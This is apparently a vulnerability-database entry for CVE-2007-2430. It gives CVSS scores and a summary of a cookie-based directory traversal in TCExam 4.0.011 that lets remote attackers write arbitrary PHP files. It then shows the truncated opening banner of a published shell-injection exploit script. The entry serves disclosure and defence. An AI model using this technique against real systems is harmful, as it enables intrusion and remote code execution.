7.8
CVSSv2

CVE-2007-2430

Published: 02/05/2007 Updated: 11/10/2017
CVSS v2 Base Score: 7.8 | Impact Score: 6.9 | Exploitability Score: 10
VMScore: 785
Vector: AV:N/AC:L/Au:N/C:N/I:C/A:N

Vulnerability Summary

shared/code/tce_tmx.php in TCExam 4.0.011 and previous versions allows remote malicious users to create arbitrary PHP files in cache/ by placing file contents and directory traversal manipulations into a SessionUserLang cookie to public/code/index.php.

Vulnerable Product Search on Vulmon Subscribe to Product

tecnick.com tcexam

Exploits

<?php print_r(' -------------------------------------------------------------------------- TCExam <= 40011 $_COOKIE["SessionUserLang"] shell injection exploit by rgod mail: retrog at alice dot it site: retrogodaltervistaorg --------------------------------------------------------------------------- '); /* download site: sou ...